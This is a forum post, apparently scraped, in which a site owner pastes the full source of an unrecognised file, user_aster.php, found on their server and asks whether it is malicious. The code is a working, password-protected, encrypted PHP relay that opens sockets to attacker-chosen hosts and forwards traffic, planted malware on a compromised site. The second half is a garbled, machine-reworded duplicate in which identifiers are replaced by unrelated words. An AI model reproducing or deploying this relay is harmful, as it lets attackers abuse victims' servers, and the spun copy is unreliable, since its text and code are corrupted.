blackdragon
Offline

Threads: 20
Joined: May 2008

Reputation:
Posts : 71Threads : 20Joined : May 2008Reputation : 1#1
Not Solved

I installed the Google analytics plugin a while back and thought I’d check to see what metric where like. Looking at the output I seen no results whatsoever. Obviously I became suspicious as to why. 

Checking into the active plugins I came across this warning: Warning(2) 

Cannot modify header information 

It mentioned the two pages that seemed to be causing the issue. One of the pages was named user_aster.php which I didn’t recognize. After making a copy of it from the server to my local drive, I deleted the file and everything seems to be working fine. 

My question is geared more towards the content of this file. I’d like to know if the code in this file may be malicious. 
Can some one with more php experience have a quick look at it and give me their opinion please. Here is the code:

define(‘vpsp_pwd’, ‘www.w3c.org’);
define(‘vpsp_enc_key’, ‘www.w3c.org’);
error_reporting(~E_ALL);
@set_time_limit(0);
ob_implicit_flush(1);
ignore_user_abort(0);
header(‘Content-type: application/octet-stream’);
header(‘Content-Transfer-Encoding: binary’);
header(‘X-VPSP-VERSION: ‘. vpsp_version);
$input = fopen(‘php://input’, ‘r’);
define(‘vpsp_enc’,  ord(fread($input, 1)) != 0);
$ok;
if (vpsp_enc) {
if (isset($GLOBALS[‘vpsp_pe’]) == false) {
$GLOBALS[‘vpsp_ks’] = VC_GenerateKeyHash(vpsp_enc_key);
$GLOBALS[‘vpsp_pe’] = VC_Init(vpsp_enc_key, $GLOBALS[‘vpsp_ks’]);
}
$GLOBALS[‘vpsp_pd’] = array_flip($GLOBALS[‘vpsp_pe’]);

$ok = VC_Decrypt(fread($input, 2));
if ($ok != ‘OK’) {
header(‘X-VPSP-ERROR: bad_enc_key’);
header(‘X-VPSP-HOST: ‘. (isset($_SERVER[‘HTTPS’]) ? ‘https://’ : ‘http://’). $_SERVER[‘HTTP_HOST’]. $_SERVER[‘REQUEST_URI’]);
exit;
}
$rBuffLen = ord(VC_Decrypt(fread($input, 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
$sBuffLen = ord(VC_Decrypt(fread($input, 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
$reqPwdLen = ord(VC_Decrypt(fread($input, 1)));
$reqPwd = ($reqPwdLen > 0) ? VC_Decrypt(fread($input, $reqPwdLen)) : ”;
$https = ord(VC_Decrypt(fread($input, 1)));
$host = VC_Decrypt(fread($input, ord(VC_Decrypt(fread($input, 1)))));
$port = ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
} else {
$ok = fread($input, 2);
if ($ok != ‘OK’) {
header(‘X-VPSP-ERROR: bad_request’);
header(‘X-VPSP-HOST: ‘. (isset($_SERVER[‘HTTPS’]) ? ‘https://’ : ‘http://’). $_SERVER[‘HTTP_HOST’]. $_SERVER[‘REQUEST_URI’]);
exit;
}
$rBuffLen = ord(fread($input, 1)) * 256 * 256 * 256 + ord(fread($input, 1)) * 256 * 256 + ord(fread($input, 1)) * 256 + ord(fread($input, 1));
$sBuffLen = ord(fread($input, 1)) * 256 * 256 * 256 + ord(fread($input, 1)) * 256 * 256 + ord(fread($input, 1)) * 256 + ord(fread($input, 1));
$reqPwdLen = ord(fread($input, 1));
$reqPwd = ($reqPwdLen > 0) ? fread($input, $reqPwdLen) : ”;
$https = ord(fread($input, 1));
$host = fread($input, ord(fread($input, 1)));
$port = ord(fread($input, 1)) * 256 + ord(fread($input, 1));
}

if ($reqPwd !== vpsp_pwd) {
$resp = “HTTP/1.0 401 Unauthorized\r\nX-VPSP-VERSION: “. vpsp_version. “\r\nX-VPSP-ERROR: bad_password\r\nX-VPSP-HOST: “. (isset($_SERVER[‘HTTPS’]) ? ‘https://’ : ‘http://’). $_SERVER[‘HTTP_HOST’]. $_SERVER[‘REQUEST_URI’]  . “\r\nConnection: close\r\n\r\n”;
if (vpsp_enc) {
echo VC_Encrypt($resp);
} else {
echo $resp;
}
exit;
}

if ($https == 1) {
$host = ‘ssl://’. $host;
}

$fsok = fsockopen($host, $port, $errno, $errstr, 20);
if ($fsok == false) {
$resp = “HTTP/1.0 503 Service Unavailable\r\nX-VPSP-VERSION: “. vpsp_version. “\r\nX-VPSP-ERROR: host_down\r\nX-VPSP-ERROR-TEXT: “. base64_encode($errstr) .”\r\nX-VPSP-HOST: “. (isset($_SERVER[‘HTTPS’]) ? ‘https://’ : ‘http://’). $_SERVER[‘HTTP_HOST’]. $_SERVER[‘REQUEST_URI’]. “\r\nX-VPSP-TARGET: “. str_replace(‘ssl://’, ”, $host). “\r\nConnection: close\r\n\r\n”;
if (vpsp_enc) {
echo VC_Encrypt($resp);
} else {
echo $resp;
}
exit;
}

while ($wbuffer = fread($input, $rBuffLen)) {
if (vpsp_enc) {
fwrite($fsok, VC_Decrypt($wbuffer));
} else {
fwrite($fsok, $wbuffer);
}
}

fflush($fsok);

while ($rbuffer = fread($fsok, $sBuffLen)) {
if (vpsp_enc) {
echo VC_Encrypt($rbuffer);
} else {
echo $rbuffer;
}
}
fflush($fsok);
fclose($fsok);

function MD5Hash($str) {
$m = md5($str);
$s = ”;
  foreach(explode(“\n”, trim(chunk_split($m, 2))) as $h) {
  $s .= chr(hexdec($h));
  }
return $s;
}

function VC_Init($key, $ks) {
$s = range(0, 255);
if (strlen($key) == 0) {
return $s;
}
$km = MD5Hash($key);
$kx = ”;
for ($i = 0; $i < 16; $i++) {
$kx .= MD5Hash($km. $km[$i].  chr($ks));
}
$r = ($ks % 0x0F) + 1;
$j = $ks;
for ($n = 0; $n < $r; $n++) {
for ($i = 0; $i < 256; $i++) {
$j = (($j + $s[$i] + $n + ord($kx[$i])) ^ $ks) % 256;
$t = $s[$i];
$s[$i] = $s[$j];
$s[$j] = $t;
}
}
for ($i = 0; $i < 256; $i++) {
$s[$i] = $s[$i] ^ $ks;
}
return $s;
}

function VC_GenerateKeyHash($key) {
$m = MD5Hash($key);
$kt = 0;
for ($i = 0; $i < 16; $i++) {
$kt += ord($m[$i]);
}
return $kt % 256;
}

function VC_Encrypt($str) {
$pe = $GLOBALS[‘vpsp_pe’];
$out = ”;
$len = strlen($str);
for ($y = 0; $y < $len; $y++) {
$out .= chr($pe[ord($str[$y])]);
}
return $out;
}

function VC_Decrypt($str) {
$pd = $GLOBALS[‘vpsp_pd’];
$out = ”;
$len = strlen($str);
for ($y = 0; $y < $len; $y++) {
$out .= chr($pd[ord($str[$y])]);
}
return $out;
}
?>

Thanks in advance    
I installed the Google analytics plugin a while back and thought I ‘d check to see what measured where alike. Looking at the end product I seen no results any. obviously I became leery as to why.Checking into the active plugins I came across this warn : Warning ( 2 ) It mentioned the two pages that seemed to be causing the write out. One of the pages was named user_aster.php which I did n’t recognize. After making a copy of it from the server to my local drive, I deleted the file and everything seems to be working fine.My question is geared more towards the content of this file. I ‘d like to know if the code in this file may be malicious.Can some one with more php experience have a quick look at it and give me their public opinion please. here is the code : 0 ) ? VC_Decrypt ( fread ( $ input, $ reqPwdLen ) ) : ” ; $ https = ord ( VC_Decrypt ( fread ( $ input, 1 ) ) ) ; $ host = VC_Decrypt ( fread ( $ remark, ord ( VC_Decrypt ( fread ( $ remark, 1 ) ) ) ) ) ; $ port = ord ( VC_Decrypt ( fread ( $ stimulation, 1 ) ) ) * 256 + ord ( VC_Decrypt ( fread ( $ input signal, 1 ) ) ) ; } else { $ ok = fread ( $ input, 2 ) ; if ( $ oklahoma ! = ‘OK ‘ ) { heading ( ‘X-VPSP-ERROR : bad_request ‘ ) ; header ( ‘X-VPSP-HOST : ‘. ( isset ( $ _SERVER [ ‘HTTPS ‘ ] ) ? ‘https : // ‘ : ‘http : // ‘ ). $ _SERVER [ ‘HTTP_HOST ‘ ]. $ _SERVER [ ‘REQUEST_URI ‘ ] ) ; exit ; $ rBuffLen = ord ( fread ( $ input, 1 ) ) * 256 * 256 * 256 + ord ( fread ( $ input, 1 ) ) * 256 * 256 + ord ( fread ( $ input, 1 ) ) * 256 + ord ( fread ( $ input, 1 ) ) ; $ sBuffLen = ord ( fread ( $ input, 1 ) ) * 256 * 256 * 256 + ord ( fread ( $ input, 1 ) ) * 256 * 256 + ord ( fread ( $ stimulation, 1 ) ) * 256 + ord ( fread ( $ input signal, 1 ) ) ; $ reqPwdLen = ord ( fread ( $ stimulation, 1 ) ) ; $ reqPwd = ( $ reqPwdLen > 0 ) ? fread ( $ stimulation, $ reqPwdLen ) : ” ; $ https = ord ( fread ( $ input, 1 ) ) ; $ host = fread ( $ input, ord ( fread ( $ input, 1 ) ) ) ; $ larboard = ord ( fread ( $ input signal, 1 ) ) * 256 + ord ( fread ( $ stimulation, 1 ) ) ; if ( $ reqPwd ! == vpsp_pwd ) { $ resp = “ HTTP/1.0 401 Unauthorized\r\nX-VPSP-VERSION : “. vpsp_version. “ \r\nX-VPSP-ERROR : bad_password\r\nX-VPSP-HOST : “. ( isset ( $ _SERVER [ ‘HTTPS ‘ ] ) ? ‘https : // ‘ : ‘http : // ‘ ). $ _SERVER [ ‘HTTP_HOST ‘ ]. $ _SERVER [ ‘REQUEST_URI ‘ ]. “ \r\nConnection : close\r\n\r\n ” ; if ( vpsp_enc ) { echo VC_Encrypt ( $ resp ) ; } else { repeat $ resp ; exit ; if ( $ https == 1 ) { $ host = ‘ssl : // ‘. $ host ; $ fsok = fsockopen ( $ master of ceremonies, $ port, $ errno, $ errstr, 20 ) ; if ( $ fsok == false ) { $ resp = “ HTTP/1.0 503 Service Unavailable\r\nX-VPSP-VERSION : “. vpsp_version. “ \r\nX-VPSP-ERROR : host_down\r\nX-VPSP-ERROR-TEXT : “. base64_encode ( $ errstr ). “ \r\nX-VPSP-HOST : “. ( isset ( $ _SERVER [ ‘HTTPS ‘ ] ) ? ‘https : // ‘ : ‘http : // ‘ ). $ _SERVER [ ‘HTTP_HOST ‘ ]. $ _SERVER [ ‘REQUEST_URI ‘ ]. “ \r\nX-VPSP-TARGET : “. str_replace ( ‘ssl : // ‘, ”, $ host ). “ \r\nConnection : close\r\n\r\n ” ; if ( vpsp_enc ) { echo VC_Encrypt ( $ resp ) ; } else { echo $ resp ; die ; while ( $ wbuffer = fread ( $ input, $ rBuffLen ) ) { if ( vpsp_enc ) { fwrite ( $ fsok, VC_Decrypt ( $ wbuffer ) ) ; } else { fwrite ( $ fsok, $ wbuffer ) ; fflush ( $ fsok ) ; while ( $ rbuffer = fread ( $ fsok, $ sBuffLen ) ) { if ( vpsp_enc ) { repeat VC_Encrypt ( $ rbuffer ) ; } else { echo $ rbuffer ; fflush ( $ fsok ) ; fclose ( $ fsok ) ; officiate MD5Hash ( $ str ) { $ m = md5 ( $ str ) ; $ s = ” ; foreach ( explode ( “ \n ”, trim ( chunk_split ( $ molarity, 2 ) ) ) as $ henry ) { $ s .= chr ( hexdec ( $ h ) ) ; return $ s ; serve VC_Init ( $ identify, $ kelvin ) { $ s = roll ( 0, 255 ) ; if ( strlen ( $ cardinal ) == 0 ) { return $ south ; $ km = MD5Hash ( $ cardinal ) ; $ kx = ” ; for ( $ i = 0 ; $ i < 16 ; $ i++ ) { $ kx .= MD5Hash ( $ kilometer. $ kilometer [ $ i ]. chr ( $ k ) ) ; $ radius = ( $ ks % 0x0F ) + 1 ; $ j = $ k ; for ( $ nitrogen = 0 ; $ n < $ roentgen ; $ n++ ) { for ( $ i = 0 ; $ i < 256 ; $ i++ ) { $ joule = ( ( $ joule + $ s [ $ i ] + $ newton + ord ( $ kx [ $ i ] ) ) ^ $ ks ) % 256 ; $ t = $ s [ $ one ] ; $ s [ $ i ] = $ s [ $ joule ] ; $ s [ $ joule ] = $ metric ton ; for ( $ i = 0 ; $ i < 256 ; $ i++ ) { $ s [ $ one ] = $ s [ $ one ] ^ $ kansas ; return $ s ; function VC_GenerateKeyHash ( $ key ) { $ m = MD5Hash ( $ samara ) ; $ kt = 0 ; for ( $ i = 0 ; $ i < 16 ; $ i++ ) { $ kt += ord ( $ m [ $ iodine ] ) ; return $ kt % 256 ; routine VC_Encrypt ( $ str ) { $ pe = $ GLOBALS [ 'vpsp_pe ' ] ; $ out = '' ; $ len = strlen ( $ str ) ; for ( $ yttrium = 0 ; $ y < $ len ; $ y++ ) { $ out .= chr ( $ pe [ ord ( $ str [ $ y ] ) ] ) ; return $ out ; serve VC_Decrypt ( $ str ) { $ pd = $ GLOBALS [ 'vpsp_pd ' ] ; $ out = '' ; $ len = strlen ( $ str ) ; for ( $ y = 0 ; $ y < $ len ; $ y++ ) { $ out .= chr ( $ palladium [ ord ( $ str [ $ y ] ) ] ) ; return $ out ; ? > Thanks in progress Find
answer

Leave a Reply

Your email address will not be published.